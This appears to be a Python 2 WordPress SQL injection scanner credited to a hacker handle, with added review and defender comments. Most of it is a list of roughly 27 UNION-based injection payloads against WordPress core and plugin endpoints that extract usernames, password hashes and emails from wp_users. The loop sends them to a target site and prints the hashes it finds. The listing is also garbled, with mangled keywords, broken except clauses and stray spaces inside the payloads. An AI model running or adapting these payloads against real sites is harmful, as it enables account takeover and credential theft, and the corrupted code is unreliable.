#! /Usr/bin/python
# WordPress SQL Injection Checker v1
# Looks for MD5-style hashes in the page source, using
# HTTP responses.
#__________
#_____\//________\_____/
#__ | //_/____////__/
#__ | //_///__//_////_//
#_____//_/\___/\____/\__,_/
# Http://www.vyc0d.uni.cc
# Vyc0d [at] hackermail [dot] com
Import sys, urllib2, re, time, httplib
# Bad HTTP Responses
# NOTE(review): HTTP status codes the author considers failures. Nothing in
# this listing reads BAD_RESP, so the status that main() returns is never
# compared against it.
BAD_RESP = [400,401,404]
# Send a HEAD request for `path` to the module-level `host` (assigned from
# sys.argv further down the file; it is not a parameter) and return the
# (status, reason, Server-header) triple.
# NOTE(review): the listing is case- and whitespace-mangled ("Def", "Try",
# "Return", "H" vs "h"); it is documented as-is, not as runnable code.
Def main (path ):
Try:
# host is expected to be "hostname/basepath/" — the first "/" separates
# the connect target from the request path.
H = httplib. HTTP (host. split ("/", 1) [0])
H. putrequest ("HEAD", "/" + host. split ("/", 1) [1] + path)
H. putheader ("Host", host. split ("/", 1) [0])
H. endheaders ()
Resp, reason, headers = h. getreply ()
# Only the Server header is surfaced from the response headers.
Return resp, reason, headers. get ("Server ")
# Error branch: the message is printed and the function falls through,
# so the caller gets None instead of a triple; the module-level call
# main("/")[2] below would then fail with TypeError.
Before t (), msg:
Print "Error Occurred:", msg
Pass
# Return the current local time formatted by time.asctime(); used only for
# the "Started" banner line.
Def timer ():
Now = time. localtime (time. time ())
Return time. asctime (now)
# Startup banner (Python 2 print statements).
Print "\ n \ t wp SQL Injection Checker v1"
Print "\ t -----------------------------"
Print "\ t vYc0d-M0slem Hax0r"
# Probe list. Each entry is a relative path plus query string carrying a
# UNION-based SQL injection attempt against old WordPress core/plugin
# endpoints that reads from the wp_users table; every entry is appended
# verbatim to the target URL in the scan loop below.
# Defender note: the tokens these strings share — UNION, SELECT, concat(,
# wp_users, "/**/" comment padding, 0x7c/0x3a separators — inside a request's
# query string are exactly what a WAF rule or an access-log search keys on.
# On the code side, the mitigation for the endpoint classes named here is
# WordPress's $wpdb->prepare() parameterisation rather than string-built SQL.
Sqls = ["index. php? Cat = 999% 20 UNION % 20 SELECT % 20 null, CONCAT (CHAR (58), user_pass, CHAR (58), user_login, CHAR (58), null, null, null % 20 FROM % 20wp_users /*",
"Index. php? Cat = % 2527% 20 UNION % 20 SELECT % 20 CONCAT (CHAR (58), user_pass, CHAR (58), user_login, CHAR (58 )) % 20 FROM % 20wp_users /*",
"Index. php? Exact = 1 & sentence = 1 & s = % b3 % 27 ))) /**/AND/**/ID =-1/**/UNION/** SELECT **/, 5, user_pass, 9, 10, 13,14, 15,16, 17,18, 19,20, 22,/**/FROM/**/wp_users % 23 ",
"Index? Page_id = 115 & forumaction = showprofile & user = 1 + union + select + null, concat (user_login, 0x2f, user_pass, 0x2f, user_email), null, null + from + wp_tbv_users /*",
"Wp-content/plugins/wp-cal/functions/editevent. php? Id =-1% 20 union % 20 select % 201, concat (user_login, 0x3a, user_pass, 0x3a, user_email), from % 20wp_users --",
"Wp-content/plugins/fgallery/fim_rss.php? Album =-1% 20 union % 20 select % 201, concat (user_login, 0x3a, user_pass, 0x3a, user_email), 7%, 20 from % 20wp_users --",
"Wp-content/plugins/wassup/spy. php? To_date =-1% 20 group % 20by % 20id % 20 union % 20 select % 20 null, conca (0x7c, user_login, 0x7c, user_pass, 0x7c), null, null, null % 20% 20 from % 20wp_users ",
"Wordspew-rss.php? Id =-998877/**/UNION/**/SELECT/**/, concat (0x7c, user_login, 0x7c, user_pass, 0x7c), concat (0x7c, user_login, 0x7c, user_pass, 0x7c), 4,5/**/FROM/**/wp_users ",
"Wp-content/plugins/st_newsletter/shiftthis-preview.php? Newsletter =-1/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users ",
"Sf-forum? Forum =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",
"Sf-forum? Forum =-99999/**/UNION/**/SELECT/**/0, concat (0x7c, user_login, 0x7c, user_pass, 0x7c, 0/**/FROM/**/wp_users /*",
"Forums? Forum = 1 & topic =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",
"Index? Page_id = 2 & album = S @ BUN & photo =-333333% 2F % 2A % 2A % 2 Funion % 2F % 2A % 2A % 2 Fselect/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c)/**/from % 2F % 2A % 2A % 2Fwp_users/** WHERE % 20 admin % 201 = % 201 ",
"Wp-download.php? Dl_id = null/**/union/**/all/**/select/**/concat (user_login, 0x3a, user_pass) /**/from/**/wp_users /*",
"WpSS/ss_load.php? Ss_id = 1 + and + (1 = 0) + union + select + 1, concat (user_login, 0x3a, user_pass, 0x3a, user_email ), 3, 4 + from + wp_users -- & display = plain ",
"Wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame. php? GalleryID =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",
"MyLDlinker. php? Url =-2/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",
"? Page_id = 2/& forum = all & value = 9999 + union + select + (select + concat_ws (0x3a, user_login, user_pass) + from + wp_users + LIMIT +) -- + & type = 9 & search = 1 & searchpage = 2 ",
"Wp-content/themes/limon/cplphoto. php? Postid =-2 + and + 1 = 1 + union + all + select +, concat (user_login, 0x3a, user_pass, 12 + from + wp_users -- & id = 2 ",
"? Event_id =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",
"Wp-content/plugins/photoracer/viewimg. php? Id =-99999 + union + select +, 4, user (), 8 /*",
"? Page_id = 2 & id =-999 + union + all + select + 1, 2, 3, 4, group_concat (user_login, 0x3a, user_pass, 0x3a, user_email ), 6 + from + wp_users /*",
"Wp-content/plugins/wp-forum/forum_feed.php? Thread =-99999 + union + select +, 3, concat (user_login, 0x2f, user_pass, 0x2f, user_email), 7 + from + wp_users /*",
"MediaHolder. php? Id =-9999/**/UNION/**/SELECT/**/concat (User (), char (58), Version (), 6, database ()--",
"Wp-content/plugins/st_newsletter/stnl_iframe.php? Newsletter =-9999 + UNION + SELECT + concat (user_login, 0x3a, user_pass, 0x3a, user_email) + FROM + wp_users --",
"Wp-content/plugins/wpSS/ss_load.php? Ss_id = 1 + and + (1 = 0) + union + select + 1, concat (user_login, 0x3a, user_pass, 0x3a, user_email ), 3, 4 + from + wp_users -- & display = plain ",
"Wp-download.php? Dl_id = null/**/union/**/all/**/select/**/concat (user_login, 0x3a, user_pass) /**/from/**/wp_users/* "]
# Script flow (flat, Python 2 syntax): argument check, host normalisation,
# Server-banner fetch, then one GET per probe string with a fixed pause.
If len (sys. argv )! = 2:
Print "\ nUsage:./wpsqli. py <site>"
Print "Example:./wpsqli. py www.site.com/w.n"
Sys. exit (1)
# Drop the scheme and the final path segment, then force a trailing "/"
# so main() can split host from base path on the first "/".
Host = sys. argv [1]. replace ("http: //", ""). rsplit ("/", 1) [0]
If host [-1]! = "/":
Host = host + "/"
Print "\ n [!] Site: ", host
Print "[!] SQL Loaded: ", len (sqls)
# [2] is the Server header of the HEAD response. If main() took its error
# branch it returns None and this subscript raises TypeError rather than
# reporting the connection problem.
Server = main ("/") [2]
Print "[!] Server: ", server
Print "\ n [!] Started: ", timer ()
Print "\ n [!] Scanning: SQL \ n"
# Defender note: on the server side this is a HEAD on the base path followed
# by a slow series (2 s apart) of plain-HTTP GETs whose query strings carry
# UNION/SELECT/wp_users tokens — noisy in access logs and WAF-detectable.
For SQL in sqls:
Time. sleep (2)
Print "[+] Trying:", SQL. replace ("\ n ","")
Try:
Source = urllib2.urlopen ("http: //" + host + SQL. replace ("\ n", ""). read ()
# Any run of 32 lowercase hex characters in the body is reported as a
# "hash". That also matches unrelated hex (cache keys, nonces, asset
# fingerprints), so a hit here is not evidence the query succeeded.
Md5s = re. findall ("[a-f0-9]" * 32, source)
If len (md5s)> = 1:
Print "[!] ", Host + SQL. replace (" \ n ","")
For md5 in md5s:
Print "\ n \ t [!] Hash to MD5: ", md5
# Looks like an except clause for urllib2.HTTPError only (mangled in this
# listing); other failures — e.g. connection errors — presumably propagate
# and end the loop. TODO confirm against a clean copy.
Failed T (urllib2.HTTPError ):
Pass
Print "\ n [-] Done \ n"